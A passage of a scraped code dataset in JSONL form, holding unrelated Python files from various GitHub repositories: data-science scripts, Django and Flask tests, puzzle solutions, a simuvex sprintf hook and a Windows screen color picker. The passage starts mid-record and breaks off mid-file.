self.time_steps = self._all_time_steps()\n self.wallet_frequency = self._wallet_frequency()\n self.address2idx = dict()\n\n def generate_edges(self, should_exclude: Callable[[str, str, float, int], bool] = None):\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n # skip header line\n continue\n\n from_address, to_address, amount, trans_time_step, price, price_time = line.strip().split(',')\n if should_exclude is not None and should_exclude(from_address, to_address, float(amount), int(trans_time_step)):\n continue\n\n if from_address not in self.address2idx:\n self.address2idx[from_address] = len(self.address2idx)\n if to_address not in self.address2idx:\n self.address2idx[to_address] = len(self.address2idx)\n\n yield self.address2idx[from_address], self.address2idx[to_address], \\\n {'amount': float(amount), 'time_step': int(trans_time_step), 'price': float(price)}\n\n def _all_time_steps(self) -> list:\n all_time_steps = set()\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n continue\n\n _, _, _, time_step_str, _, _ = line.strip().split(',')\n all_time_steps.add(int(time_step_str))\n\n return sorted(list(all_time_steps))\n\n def _wallet_frequency(self):\n \"\"\"\n Count how many times each wallet address appears across the whole transaction file.\n :return: a list of (count, address) tuples sorted by count\n \"\"\"\n address_count = defaultdict(int)\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n continue\n\n from_address, to_address, _, _, _, _ = line.strip().split(',')\n address_count[from_address] += 1\n address_count[to_address] += 1\n\n address_count = [(count, address) for address, count in address_count.items()]\n return sorted(address_count)\n","repo_name":"SCAuFish/Graph-Learning-on-Crypto-Transactions","sub_path":"graph_tools/components/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12845883903","text":"# Q.3 Write a program to convert a Python object into a JSON string.\n\n\n\nimport json\n\n# a={'Navgurukul': 100}\n# mystring=json.dumps(a)\n# print(mystring)\n\nx={\n \"name\":\"Rani\",\n \"Age\":17,\n \"city\":\"New York\"\n}\n# y=open(\"Meraki q3.json\",\"w\")\n# y.write(json.dump(x,y,indent=4))\n# y.close()\ny=json.dumps(x)\nprint(y)\n\n\n\n\n# import json\n# x = {\n# \"name\": \"John\",\n# \"age\": 30,\n# \"married\": True,\n# \"divorced\": False,\n# \"children\": (\"Ann\",\"Billy\"),\n# \"pets\": None,\n# \"cars\": [\n# {\"model\": \"BMW 230\", \"mpg\": 27.5},\n# {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n# ]\n# }\n# print(json.dumps(x, indent=4, separators=(\". 
\", \" = \"),sort_keys=True))\n\n","repo_name":"Rani-rathod/json","sub_path":"Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"14634394902","text":"from django.test import TestCase\nfrom task_manager.users.models import MyUser\nfrom task_manager.statuses.models import Status\nfrom task_manager.labels.models import Label\nfrom .models import Task\nfrom django.urls import reverse\nfrom django import test\n\n\n@test.modify_settings(\n MIDDLEWARE={\n \"remove\": [\n \"rollbar.contrib.django.middleware.RollbarNotifierMiddleware\",\n ]\n }\n)\nclass TaskTest(TestCase):\n fixtures = [\"user.json\", \"status.json\", \"task.json\", \"label.json\"]\n\n def setUp(self):\n self.user = MyUser.objects.last()\n self.task = Task.objects.last()\n self.status = Status.objects.last()\n self.labels = Label.objects.last()\n self.client.force_login(self.user)\n\n def test_setup(self):\n self.assertEqual(self.task.pk, 77)\n self.assertEqual(self.user.pk, 777)\n self.assertEqual(self.status.pk, 100)\n self.assertEqual(self.labels.pk, 1)\n\n def test_unauthorized(self):\n self.client.logout()\n response = self.client.get(reverse(\"tasks:task_list\"))\n self.assertEqual(response.status_code, 302)\n\n def test_task_page(self):\n response = self.client.get(reverse(\"tasks:task_list\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/task_list.html\")\n\n def test_get_create_task(self):\n response = self.client.get(reverse(\"tasks:create_task\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/create.html\")\n\n def test_post_create_task(self):\n new_task_create_data = {\n \"name\": \"name_test2\",\n \"description\": \"description for task_test2\",\n \"status\": self.status.pk,\n \"executor\": self.user.pk,\n \"labels\": self.labels.pk,\n }\n\n response = self.client.post(reverse(\"tasks:create_task\"), new_task_create_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 2)\n\n task = Task.objects.last()\n self.assertEqual(task.name, \"name_test2\")\n self.assertEqual(task.description, \"description for task_test2\")\n self.assertEqual(task.status.name, \"status_test\")\n self.assertEqual(task.executor.username, \"username_test\")\n self.assertEqual(task.author.username, \"username_test\")\n self.assertEqual(task.labels.all()[0].name, \"label_test\")\n\n def test_delete_task(self):\n response = self.client.get(\n reverse(\"tasks:delete_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/delete.html\")\n\n response = self.client.post(\n reverse(\"tasks:delete_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 0)\n\n def test_update_task(self):\n new_user = MyUser.objects.create(\n username=\"newbie\",\n first_name=\"new\",\n last_name=\"bie\",\n password=\"secret\",\n )\n\n new_label = Label.objects.create(name=\"new\")\n\n update_task_create_data = {\n \"name\": \"name_update2\",\n \"description\": \"description for task_update2\",\n \"status\": self.status.pk,\n \"executor\": new_user.pk,\n \"labels\": {self.labels.pk, new_label.pk},\n }\n\n response = self.client.get(\n reverse(\"tasks:update_task\", kwargs={\"pk\": self.task.pk}),\n )\n 
self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/update.html\")\n\n response = self.client.post(\n reverse(\"tasks:update_task\", kwargs={\"pk\": self.task.pk}),\n update_task_create_data,\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 1)\n\n task = Task.objects.last()\n self.assertEqual(task.name, \"name_update2\")\n self.assertEqual(task.description, \"description for task_update2\")\n self.assertEqual(task.status.name, \"status_test\")\n self.assertEqual(task.author.username, \"username_test\")\n\n self.assertEqual(task.executor.pk, new_user.pk)\n\n self.assertEqual(task.labels.last().name, \"new\")\n self.assertEqual(task.labels.count(), 2)\n\n def test_detail_task(self):\n response = self.client.get(\n reverse(\"tasks:detail_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/detail.html\")\n","repo_name":"tommyqamaz/task-manager","sub_path":"task_manager/tasks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10906805469","text":"import itertools\n\nt = int(input())\nfor _ in range(t):\n l, k = [int(x) for x in input().strip().split(\" \")]\n a = [int(i) for i in input().split()]\n # x = eqavg(arr, k)\n b = list(itertools.permutations(a))\n for ele in range(len(b)):\n c1, c2, sum = 0, 0, 0\n for i in range(k):\n sum = sum + b[ele][i]\n m = sum / k\n for i in range(len(b[ele]) - k + 1):\n j = i\n sum = 0\n while j < (i + k):\n sum = sum + b[ele][j]\n j += 1\n c1+=1\n if (sum/k) == m:\n c2+=1\n if c1 == c2:\n print (\"YES\")\n print(' '.join(map(str, b[ele]))) \n break\n if c1 != c2:\n print(\"NO\")\n","repo_name":"muskankhedia/CompetitiveAnswers","sub_path":"CodeChef/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"15999669430","text":"import os\nfrom pathlib import Path\n\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\ndef get_data_dir():\n project_dir = str(Path(__file__).parent.parent.parent.absolute())\n path = os.path.join(project_dir, 'data')\n return path\n\n\ndef get_experiments_dir():\n project_dir = str(Path(__file__).parent.parent.parent.absolute())\n path = os.path.join(project_dir, 'experiments')\n return path\n\n\ndef prepare_logger(opts):\n ''' prepare logger using the given options '''\n logger = TensorBoardLogger(opts['logs_path'], name=opts['experiment_name'])\n return logger\n\n\ndef prepare_trainer(opts, logger=None):\n ''' prepare the trainer using the given options '''\n\n from src.options import trainer_optional_arguments\n trainer_args = dict((key, opts[key]) for key in trainer_optional_arguments if key in opts)\n\n trainer = Trainer(weights_summary='full', logger=logger, default_root_dir=opts['logs_path'], **trainer_args)\n\n return trainer","repo_name":"ACLab-BGU/nn-ambisonics-upscaler","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73241175856","text":"import math\n\nclass Solution(object):\n def distributeCandies(self, candies, num_people):\n k, n = num_people, candies\n 
alloc = [0]*k\n Final = (0, 0)\n for i in range(1, k+1):\n s = ((-1-2*i) + math.sqrt(1+8*n)) / (2*k)\n t = math.floor(s)\n alloc[i-1] = i*(t+1) + k*t*(t+1)//2\n Final = max(Final, (s - math.floor(s), i))\n alloc[Final[1]-1] += (n - sum(alloc))\n return alloc\n\nif __name__ == \"__main__\":\n input = Solution()\n candies = 10\n num_people = 3\n\n check = input.distributeCandies(candies, num_people)\n print(check)","repo_name":"hiratekatayama/math_puzzle","sub_path":"leet/Distribute_Candies_to_People.py","file_name":"Distribute_Candies_to_People.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"11537475914","text":"import logging\nfrom simuvex.s_format import FormatParser\n\nl = logging.getLogger(\"simuvex.procedures.sprintf\")\n\n######################################\n# sprintf\n######################################\n\nclass sprintf(FormatParser):\n #pylint:disable=arguments-differ\n\n def run(self, dst_ptr):\n\n #additional code\n trace_data = (\"sprintf\", {\"dst_ptr\": (dst_ptr, dst_ptr.symbolic)})\n try:\n self.state.procedure_data.global_variables[\"trace\"].append(trace_data)\n except KeyError:\n self.state.procedure_data.global_variables[\"trace\"] = []\n self.state.procedure_data.global_variables[\"trace\"].append(trace_data)\n #end of additional code\n\n # The format str is at index 1\n fmt_str = self._parse(1)\n out_str = fmt_str.replace(2, self.arg)\n self.state.memory.store(dst_ptr, out_str)\n\n # place the terminating null byte\n self.state.memory.store(dst_ptr + (out_str.size() / 8), self.state.se.BVV(0, 8))\n\n # size_t has size arch.bits\n return self.state.se.BVV(out_str.size()/8, self.state.arch.bits)\n","repo_name":"Agnishom/SummerTrace","sub_path":"libc___so___6/sprintf.py","file_name":"sprintf.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"34243462005","text":"import cv2\n\nfrom GetScreen import GetScreen\nimport Processing\n\ndef main():\n\n while True:\n\n screen = GetScreen('TetrisOnline')\n processed_screen = Processing.ProcessImage(screen)\n cv2.imshow('window', processed_screen)\n\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n\n\nmain()","repo_name":"jigarhira/DeepTetris","sub_path":"DeepTetris.py","file_name":"DeepTetris.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"12937088424","text":"from collections import Counter\n\ndef get_input_list():\n return [\"abcdef\", \"bababc\", \"abbcde\", \"abcccd\", \"aabcdd\", \"abcdee\", \"ababab\"]\n\ndef is_duplicate(string):\n\t\"\"\"Return true on first duplicate character in string\"\"\"\n\tdup_dic = Counter(string)\n\tfor key, value in dup_dic.items():\n\t\tif value == 2:\n\t\t\treturn True\n\treturn False\n\t\t\ndef is_triplicate(string):\n\t\"\"\"Return true on first triplicate character in string\"\"\"\n\ttri_dic = Counter(string)\n\tcount = 0\n\tfor key, value in tri_dic.items():\n\t\tif value == 3:\n\t\t\treturn True\n\treturn False\n\n\nif __name__ == \"__main__\":\n\n\tduplicate_count = 0\n\ttriplicate_count = 0\n\n\tinput_list = get_input_list()\n\n\tfor i in input_list:\n\t\tif is_duplicate(i):\n\t\t\tduplicate_count += 1\n\t\tif is_triplicate(i):\n\t\t\ttriplicate_count += 1\n\n\tprint(duplicate_count * 
triplicate_count)\n\n\n","repo_name":"SteveAmor/AdventOfCode2018","sub_path":"day2/day2_part1.py","file_name":"day2_part1.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23825473986","text":"# -*- coding: utf-8 -*-\n# Author: Rowan\nimport json\nimport unittest\n\nfrom project import app\nfrom test import AUTH_HEADERS, DEFAULT_PATH\n\n\nclass TestHistory(unittest.TestCase):\n def testCreateHistory1(self):\n with app.test_client() as client:\n data = {\n \"food_id\": 2\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(201, res.status_code)\n\n def testCreateHistory2(self):\n with app.test_client() as client:\n data = {\n \"food_id2\": 2\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(401, res.status_code)\n\n def testCreateHistory3(self):\n with app.test_client() as client:\n data = {\n \"food_id\": 0\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(402, res.status_code)\n\n def testGetListHistories(self):\n with app.test_client() as client:\n res = client.get(DEFAULT_PATH.format('/histories'), headers=AUTH_HEADERS)\n self.assertEqual(201, res.status_code)\n\n def testDeleteHistory(self):\n with app.test_client() as client:\n res = client.delete(DEFAULT_PATH.format('/history/10'), headers=AUTH_HEADERS)\n self.assertEqual(401, res.status_code)\n","repo_name":"baohoquoc/WIET","sub_path":"API/test/TestHistory.py","file_name":"TestHistory.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"69809751534","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\n\nv1, u1 = np.genfromtxt(\"integrator.csv\", delimiter=';', unpack=True)\nv2, u2 = np.genfromtxt(\"differentiator.csv\", delimiter=';', unpack=True)\n\n\ndef f(x, a, b):\n y=a*x**b\n return y\n\npopt1, pcov1 = curve_fit(f, v1[:12], u1[:12])\na1=ufloat(popt1[0], np.sqrt(np.diag(pcov1))[0])\nb1=ufloat(popt1[1], np.sqrt(np.diag(pcov1))[1])\nx1=np.linspace(40, 700, 1000)\n\npopt2, pcov2 = curve_fit(f, v2, u2)\na2=ufloat(popt2[0], np.sqrt(np.diag(pcov2))[0])\nb2=ufloat(popt2[1], np.sqrt(np.diag(pcov2))[1])\nx2=np.linspace(40, 1000, 1000)\n\nprint(\"Integrator\", a1, b1)\nprint(\"Differentiator\", a2, b2)\n\nplt.figure()\nplt.plot(v1, u1, \"x\", label=\"Data\")\nplt.plot(x1, f(x1, *popt1), label=\"Fit\")\nplt.xlabel(r\"$\\nu$ / Hz\")\nplt.ylabel(r\"$U_A$ / V\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.grid()\nplt.legend()\nplt.savefig(\"plot4.pdf\", bbox_inches=\"tight\")\n\nplt.figure()\nplt.plot(v2, u2, \"x\", label=\"Data\")\nplt.plot(x2, f(x2, *popt2), label=\"Fit\")\nplt.xlabel(r\"$\\nu$ / Hz\")\nplt.ylabel(r\"$U_A$ / V\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.grid()\nplt.legend()\nplt.savefig(\"plot5.pdf\", bbox_inches=\"tight\")\n\nplt.show()\n","repo_name":"NoKryst13/V51","sub_path":"intdiff.py","file_name":"intdiff.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"1637896687","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nimport 
urllib.request\nimport numpy as np\nimport squarify as squ\n\nfrom konlpy.tag import Mecab\nfrom wordcloud import WordCloud\n\nplt.style.use('seaborn-white')\n\nfontPath = 'C:/Windows/Fonts/NanumBarunGothic.ttf'\nfont = fm.FontProperties(fname=fontPath, size=10)\nplt.rc('font', family='NanumBarunGothic')\n\n\nraw = urllib.request.urlopen('https://raw.githubusercontent.com/e9t/nsmc/master/ratings.txt').readlines()\n\n# Decode the raw bytes into Korean (Hangul) text\nraw = [x.decode() for x in raw[1:]]\nreviews = []\nfor i in raw:\n reviews.append(i.split('\\t')[1])\n# print (reviews[:5])\n\n# Extract nouns using morphological analysis\ntagger = Mecab()\n\nnouns = []\nfor review in reviews:\n for noun in tagger.nouns(review):\n nouns.append(noun)\n#nouns[:10]\n\n# Build a stopword dictionary\nstop_words = \"영화 전 난 일 걸 뭐 줄 만 건 분 개 끝 잼 이거 번 중 듯 때 게 내 말 나 수 거 점 것\"\nstop_words = stop_words.split(' ')\n#print(stop_words)\n\n# Perform morphological analysis excluding stopwords\nnouns = []\nfor review in reviews:\n for noun in tagger.nouns(review):\n if noun not in stop_words:\n nouns.append(noun)\n#nouns[:10]\n\n# Measure word frequencies\nfrom collections import Counter\n\nnouns_counter = Counter(nouns)\ntop_nouns = dict(nouns_counter.most_common(50))\n\ntop_nouns\n\n# Visualize word frequencies\ny_pos = np.arange(len(top_nouns))\n\nplt.figure(figsize=(12,12))\nplt.barh(y_pos, top_nouns.values())\nplt.title('Word Count')\nplt.yticks(y_pos, top_nouns.keys())\nplt.show()\n\n# Create a WordCloud object and build the word cloud from the counts with generate_from_frequencies()\n\nwc = WordCloud(background_color='white', font_path='./font/NanumBarunGothic.ttf')\nwc.generate_from_frequencies(top_nouns)\n\n# Visualize the WordCloud (using the image display function imshow())\nfigure = plt.figure(figsize=(12,12))\nax = figure.add_subplot(1, 1, 1)\nax.axis('off')\nax.imshow(wc)\nplt.show()\n\n\n# squarify treemap visualization\n\nnorm = mpl.colors.Normalize(vmin=min(top_nouns.values()),\n vmax=max(top_nouns.values()))\n\ncolors = [mpl.cm.Blues(norm(value)) for value in top_nouns.values()]\n\nsqu.plot(label=top_nouns.keys(),\n sizes=top_nouns.values(),\n color=colors,\n alpha=.7)\n\n\n\n\n","repo_name":"ds5cmm/selenium","sub_path":"Analysis/Keyword_Analysis.py","file_name":"Keyword_Analysis.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29263513496","text":"# Reference: https://note.nkmk.me/python-bit-operation/\n# <<: left shift operator\n# >>: right shift operator\n\nN = 4\n\n# print(1<<4) # 16\n# print(bin(1<<4))\n# print('')\n\nfor i in range(1<<N):\n cond = [0]*N\n for j in range(N):\n # print(bin(i>>j))\n # print(1 & (i>>j)) # check whether the 2^0 bit is 0 or 1\n if 1 & (i>>j):\n cond[j] = 1\n\n print(cond)","repo_name":"Toshiyana/atcoder_study","sub_path":"study_algorithm/bit_zentansaku/bit_zentansaku.py","file_name":"bit_zentansaku.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"5912104931","text":"name = input(\"Enter file:\")\nif len(name) < 1:\n name = \"mbox-short.txt\"\nhandle = open(name)\n\ncounts=dict()\nfor line in handle:\n line=line.rstrip()\n if not line.startswith('From '):\n continue\n line=line.split()\n emails=line[1]\n for email in emails.split():\n counts[email]=counts.get(email,0)+1\n \nMaxWord=None\nMaxCount=None \nfor key,value in counts.items():\n if MaxCount is None or value>MaxCount:\n MaxCount=value\n MaxWord=key\n \nprint(MaxWord,MaxCount)\n","repo_name":"AA19BD/PythonSummer","sub_path":"Coursera-Python/Python Data 
Structures/Week5/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73791148654","text":"from Matchers.MatcherBase import MatcherBase\n\n\nclass WeightedMatcher(MatcherBase):\n def match_pair(self, taken, index, rankingMatrix, weights):\n availableRanking = [(i, r) for i, r in enumerate(\n rankingMatrix[index]) if not taken[i]]\n\n weightedMatches = [(i, self.__weightedMatch(\n index, i, r, rankingMatrix, weights)) for i, r in availableRanking]\n\n match = max(weightedMatches, key=lambda a: a[1])[0]\n\n return match\n\n def __weightedMatch(self, index, preferenceIndex, preference, rankingMatrix, weights):\n return preference * \\\n weights[index] + \\\n rankingMatrix[preferenceIndex][index] * \\\n weights[preferenceIndex]\n","repo_name":"GThibeault/ToddProblem","sub_path":"ToddProblem/src/Matchers/WeightedMatcher.py","file_name":"WeightedMatcher.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10628172518","text":"import SimpleITK as sitk\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef fill_outside(img: sitk.Image, value: int):\r\n img = sitk.GetArrayFromImage(img)\r\n img[0, 0] = 0\r\n mask = np.zeros((img.shape[0] + 2, img.shape[1] + 2), np.uint8)\r\n cv2.floodFill(img,\r\n mask,\r\n (0, 0), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[img.shape[0] - 1, 0] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (0, img.shape[0] - 1), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[img.shape[0] - 1, img.shape[1] - 1] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (img.shape[1] - 1, img.shape[0] - 1), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[0, img.shape[1] - 1] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (img.shape[1] - 1, 0), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img = sitk.GetImageFromArray(img)\r\n return img","repo_name":"SMART-pipeline/Volume-reconstruction","sub_path":"VISoR_Reconstruction/reconstruction/brain_reconstruct_methods/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"56"} +{"seq_id":"1728146116","text":"# colorPicker.py\n# windows only\n\n\"\"\"\n\tA simple python application that allows you to pick colors on your screen.\n\t\n\t-> Keep the program running in the background\n\t-> Move your mouse cursor to anywhere on the screen.\n\t-> Hit the keyboard shortcut. (Default: CTRL + ALT + C)\n\t-> The color code (Hex by default) will then be available on your clipboard.\n\t-> It also shows up on the console application alongside it's RGB value.\n\"\"\"\n\nimport keyboard # to set up and listen to hotkeys.\nimport pyscreenshot # to take a screenshot. 
(duh)\nimport pyperclip # to copy color codes to clipboard.\nimport ctypes # to access cursor position.\nimport os # to clear screen and set window title.\n\nHOTKEY = \"ctrl+alt+c\"\n\ntry:\n\t# https://stackoverflow.com/a/32541666/11912727\n\t# for accurate cursor coordinates.\n\tctypes.windll.user32.SetProcessDPIAware()\nexcept AttributeError:\n\tpass # apparently it doesn't work on Windows XP.\n\t\nclass POINT(ctypes.Structure):\n\t_fields_ = [(\"x\", ctypes.c_long), (\"y\", ctypes.c_long)]\n\ndef get_position():\n\t\"\"\"Get current cursor position.\"\"\"\n\t\n\tcursor = POINT()\n\t# grab the position of the mouse cursor.\n\tctypes.windll.user32.GetCursorPos(ctypes.byref(cursor))\n\treturn (cursor.x, cursor.y)\n\ndef rgb2hex(rgb):\n\t\"\"\"To convert the RGB values to HEX.\"\"\"\n\t\n\tclamp = lambda x: max(0, min(x, 255))\n\treturn f\"#{clamp(rgb[0]):02x}{clamp(rgb[1]):02x}{clamp(rgb[2]):02x}\"\n\t\ndef get_color(coordX, coordY):\n\t\"\"\"To get the color of the pixel of a given coord on the screen.\"\"\"\n\t\n\tscreenie = pyscreenshot.grab() # take a screenshot.\n\timage = screenie.convert('RGB')\n\tr, g, b = image.getpixel((coordX, coordY)) # get the color of the pixel at the coords.\n\treturn (r, g, b)\n\ndef on_hotkey_press():\n\t\"\"\"Called when CTRL+ALT+C is pressed\"\"\"\n\t\n\tcursor_position = get_position()\n\tcolor = get_color(cursor_position[0], cursor_position[1])\n\thex_color = rgb2hex(color)\n\tprint(\"[Color Picked]\")\n\tprint(f\"Coordinates: X = {cursor_position[0]}, Y = {cursor_position[1]}\")\n\tprint(f\"RGB: {', '.join(str(i) for i in color)}\")\n\tprint(f\"HEX: {hex_color}\")\n\tprint()\n\tpyperclip.copy(hex_color) # copy the hex code to clipboard.\n\nkeyboard.add_hotkey(HOTKEY, on_hotkey_press) # set up the keyboard combo and hook it to the function.\nos.system('cls & title Screen Color Picker & color e')\nprint(f\"Point your mouse cursor at anywhere on the screen, hit {HOTKEY.upper()}\")\nprint(\"The HEX color code will be available on your clipboard. (Also printed here)\\n\")\nkeyboard.wait() # infinite blocking loop just to listen for the hotkey.","repo_name":"waterrmalann/screen-color-picker","sub_path":"color_picker.py","file_name":"color_picker.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"71764778416","text":"import pandas as pd\nfrom pandas import json_normalize\nimport json\nfrom tqdm import tqdm\nfrom os import path, mkdir\nfrom pathlib import Path\n\ndef create_dataset(input_file_name: str, output_file_name: str, input_column_name: list, output_column_name: list = None, index: bool = False) -> None:\n \"\"\"\n input_file_name (str): Input JSON file name\n output_file_name (str): Output CSV file name\n input_column_name (str): Filter input file based on the columns\n output_column_name (list): Rename input columns. None by default. Note: Passing 'None' will keep the same column names\n index (bool): Toggle index in output file. 
False (turned off) by default\n \"\"\"\n\n\n with open(input_file_name) as f:\n input_file_data: list = json.load(f)\n output_file_data: list = []\n\n if output_column_name is not None:\n if len(input_column_name) != len(output_column_name):\n print(\"Input-Output columns need to have same length and input columns must be not null!\")\n return\n else: output_column_name = input_column_name\n\n valid_columns: list = list(input_file_data[0].keys()) + [\"keywords.id\", \"keywords.name\", \"keywords.score\"]\n valid_columns.remove(\"keywords\")\n\n if \"affiliation\" in valid_columns:\n valid_columns.remove(\"affiliation\")\n valid_columns += [\"affiliation.id\", \"affiliation.name\", \"affiliation.photoUrl\"]\n\n if \"keywords\" in input_column_name:\n input_column_name.remove(\"keywords\")\n input_column_name += [\"keywords.id\", \"keywords.name\", \"keywords.score\"]\n\n if \"affiliation\" in input_column_name:\n input_column_name.remove(\"affiliation\")\n input_column_name += [\"affiliation.id\", \"affiliation.name\", \"affiliation.photoUrl\"]\n\n for col in input_column_name:\n if col not in valid_columns:\n print(f\"Input column [{col}] not found!\")\n print(\"Available columns are: [\" + \", \".join(valid_columns) + \"]\")\n return\n\n has_publications: bool = (\"publications\" in input_column_name)\n has_keywords: list = [\"keywords.id\" in input_column_name , \"keywords.name\" in input_column_name, \"keywords.score\" in input_column_name]\n has_affiliation: list = [\"affiliation.id\" in input_column_name , \"affiliation.name\" in input_column_name, \"affiliation.photoUrl\" in input_column_name]\n\n\n def get_data_from_record(record: dict) -> dict:\n data: dict = {}\n\n for c in input_column_name:\n try: data[c] = record[c]\n except KeyError: continue\n\n if has_affiliation[0]: data[\"affiliation.id\"] = record[\"affiliation\"][\"id\"]\n if has_affiliation[1]: data[\"affiliation.name\"] = record[\"affiliation\"][\"name\"]\n if has_affiliation[2]: data[\"affiliation.photoUrl\"] = record[\"affiliation\"][\"photoUrl\"]\n\n return data\n\n\n if has_publications and any(has_keywords):\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for pid in record[\"publications\"]:\n for keyword in record[\"keywords\"]:\n temp_data: dict = data.copy()\n\n if has_keywords[0]: temp_data[\"keywords.id\"] = keyword[\"id\"]\n if has_keywords[1]: temp_data[\"keywords.name\"] = keyword[\"name\"]\n if has_keywords[2]: temp_data[\"keywords.score\"] = keyword[\"score\"]\n temp_data[\"publications\"] = pid\n\n output_file_data.append(temp_data)\n\n\n elif has_publications:\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for pid in record[\"publications\"]:\n temp_data: dict = data.copy()\n temp_data[\"publications\"] = pid\n output_file_data.append(temp_data)\n\n\n elif any(has_keywords):\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for keyword in record[\"keywords\"]:\n temp_data: dict = data.copy()\n\n if has_keywords[0]: temp_data[\"keywords.id\"] = keyword[\"id\"]\n if has_keywords[1]: temp_data[\"keywords.name\"] = keyword[\"name\"]\n if has_keywords[2]: temp_data[\"keywords.score\"] = keyword[\"score\"]\n\n output_file_data.append(temp_data)\n\n\n else:\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n output_file_data.append(get_data_from_record(record))\n\n print(f\"Creating 
